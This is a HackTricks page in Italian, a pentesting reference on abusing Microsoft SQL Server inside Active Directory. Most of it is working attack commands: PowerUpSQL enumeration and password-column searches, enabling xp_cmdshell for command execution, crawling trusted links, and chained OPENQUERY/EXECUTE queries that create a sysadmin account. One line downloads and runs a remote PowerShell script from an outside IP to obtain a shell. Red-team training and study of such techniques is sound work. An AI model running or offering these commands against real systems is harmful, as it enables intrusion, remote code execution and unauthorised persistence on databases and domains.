Italian - Ht
HackTricks Training Twitter Linkedin Sponsor

MSSQL AD Abuse

Impara l'hacking AWS da zero a eroe con htARTE (Esperto Red Team AWS di HackTricks)!
LogoWebsec | Uw Cybersecurity Specialist

Enumerazione / Scoperta MSSQL

Il modulo powershell PowerUpSQL è molto utile in questo caso.

Import-Module .\PowerupSQL.psd1

Enumerazione dalla rete senza sessione di dominio

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10

#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test

Enumerazione dall'interno del dominio

# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo

#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose

#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

Abuso di base di MSSQL

Accesso al database

#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"

#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"

# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize

MSSQL RCE

Potrebbe essere anche possibile eseguire comandi all'interno dell'host MSSQL

Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary

Trucchi di Base per l'Hacking di MSSQL

Verifica nella pagina menzionata nella sezione seguente come fare questo manualmente.

page1433 - Pentesting MSSQL - Microsoft SQL Server

Collegamenti Affidabili di MSSQL

Se un'istanza di MSSQL è considerata affidabile (collegamento al database) da un'altra istanza di MSSQL. Se l'utente ha privilegi sul database affidabile, sarà in grado di utilizzare il rapporto di fiducia per eseguire query anche nell'altra istanza. Queste fiducie possono essere concatenate e a un certo punto l'utente potrebbe essere in grado di trovare un database mal configurato dove può eseguire comandi.

I collegamenti tra database funzionano anche attraverso le fiducie tra foreste.

Abuso di Powershell

#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0

#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose

#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'

#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"

#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql  -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'

#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"

#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv –Verbose –Instance "SQLServer1\Instance1"

#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'

Metasploit

È possibile controllare facilmente i collegamenti fidati utilizzando Metasploit.

#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session

Manuale - Openquery()

Da Linux potresti ottenere una shell della console MSSQL con sqsh e mssqlclient.py.

Da Windows potresti anche trovare i link ed eseguire comandi manualmente utilizzando un client MSSQL come HeidiSQL

Accedi utilizzando l'autenticazione di Windows:

Trova Collegamenti Affidabili

select * from master..sysservers;
EXEC sp_linkedservers;

Eseguire query in un link affidabile

Eseguire le query attraverso il link (esempio: trovare più link nella nuova istanza accessibile):

select * from openquery("dcorp-sql1", 'select * from master..sysservers')

Controlla dove vengono utilizzati apici doppi e singoli, è importante usarli in quel modo.

Puoi continuare manualmente questa catena di collegamenti fidati all'infinito.

# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')

# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')

Manuale - ESEGUI

Puoi anche abusare dei link fidati utilizzando ESEGUI:

#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"

Escalazione dei privilegi locali

L'utente locale MSSQL di solito ha un tipo speciale di privilegio chiamato SeImpersonatePrivilege. Questo consente all'account di "impersonare un client dopo l'autenticazione".

Una strategia che molti autori hanno ideato è quella di forzare un servizio SYSTEM ad autenticarsi presso un servizio fraudolento o di tipo man-in-the-middle creato dall'attaccante. Questo servizio fraudolento è quindi in grado di impersonare il servizio SYSTEM mentre cerca di autenticarsi.

SweetPotato ha una raccolta di queste varie tecniche che possono essere eseguite tramite il comando execute-assembly di Beacon.

LogoWebsec | Uw Cybersecurity Specialist
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
PreviousLAPSNextOver Pass the Hash/Pass the Key

Last updated